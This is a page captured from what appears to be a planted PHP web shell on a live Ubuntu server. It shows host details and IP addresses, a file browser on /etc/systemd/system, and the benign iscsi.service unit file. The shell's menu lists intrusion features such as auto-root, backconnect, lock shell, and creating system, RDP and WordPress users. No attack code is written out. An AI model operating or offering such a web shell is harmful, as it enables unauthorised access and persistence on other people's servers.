Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
clamav-daemon.service.d
[ DIR ]
drwxr-xr-x
cloud-final.service.wants
[ DIR ]
drwxr-xr-x
cloud-init.target.wants
[ DIR ]
drwxr-xr-x
emergency.target.wants
[ DIR ]
drwxr-xr-x
final.target.wants
[ DIR ]
drwxr-xr-x
getty.target.wants
[ DIR ]
drwxr-xr-x
mdmonitor.service.wants
[ DIR ]
drwxr-xr-x
multi-user.target.wants
[ DIR ]
drwxr-xr-x
network-online.target.wants
[ DIR ]
drwxr-xr-x
open-vm-tools.service.requires
[ DIR ]
drwxr-xr-x
paths.target.wants
[ DIR ]
drwxr-xr-x
rescue.target.wants
[ DIR ]
drwxr-xr-x
sleep.target.wants
[ DIR ]
drwxr-xr-x
snapd.mounts.target.wants
[ DIR ]
drwxr-xr-x
sockets.target.wants
[ DIR ]
drwxr-xr-x
sshd-keygen@.service.d
[ DIR ]
drwxr-xr-x
sysinit.target.wants
[ DIR ]
drwxr-xr-x
timers.target.wants
[ DIR ]
drwxr-xr-x
dbus-org.freedesktop.resolve1....
1.74
KB
-rw-r--r--
dbus-org.freedesktop.timesync1...
1.72
KB
-rw-r--r--
droplet-agent.service
358
B
-rw-r--r--
iscsi.service
987
B
-rw-r--r--
multipath-tools.service
798
B
-rw-r--r--
snap-certbot-4965.mount
329
B
-rw-r--r--
snap-certbot-5057.mount
329
B
-rw-r--r--
snap-core-17212.mount
323
B
-rw-r--r--
snap-core-17247.mount
323
B
-rw-r--r--
snap-core20-2599.mount
326
B
-rw-r--r--
snap-core20-2669.mount
326
B
-rw-r--r--
snap-core24-1196.mount
326
B
-rw-r--r--
snap-core24-1225.mount
326
B
-rw-r--r--
snap-lxd-31333.mount
320
B
-rw-r--r--
snap-lxd-35819.mount
320
B
-rw-r--r--
snap-snapd-25202.mount
326
B
-rw-r--r--
snap-snapd-25577.mount
326
B
-rw-r--r--
snap.certbot.renew.service
451
B
-rw-r--r--
snap.certbot.renew.timer
293
B
-rw-r--r--
snap.lxd.activate.service
467
B
-rw-r--r--
snap.lxd.daemon.service
541
B
-rw-r--r--
snap.lxd.daemon.unix.socket
330
B
-rw-r--r--
snap.lxd.user-daemon.service
446
B
-rw-r--r--
snap.lxd.user-daemon.unix.sock...
345
B
-rw-r--r--
sshd.service
538
B
-rw-r--r--
syslog.service
469
B
-rw-r--r--
vmtoolsd.service
489
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : iscsi.service
[Unit] Description=Login to default iSCSI targets Documentation=man:iscsiadm(8) man:iscsid(8) Wants=network-online.target remote-fs-pre.target After=network-online.target iscsid.service Before=remote-fs-pre.target DefaultDependencies=no Conflicts=shutdown.target Before=shutdown.target # Must have some pre-defined targets to login to ConditionDirectoryNotEmpty=|/etc/iscsi/nodes # or have a session to use via iscsid ConditionDirectoryNotEmpty=|/sys/class/iscsi_session [Service] Type=oneshot RemainAfterExit=true # iscsiadm --login will return 21 if no nodes are configured, # and 15 if a session is alread logged in (which we do not # consider an error) SuccessExitStatus=15 21 # Note: iscsid will be socket activated by iscsiadm ExecStart=/sbin/iscsiadm -m node --loginall=automatic ExecStart=/lib/open-iscsi/activate-storage.sh ExecStop=/lib/open-iscsi/umountiscsi.sh ExecStop=/bin/sync ExecStop=/lib/open-iscsi/logout-all.sh [Install] WantedBy=sysinit.target Alias=iscsi.service
Close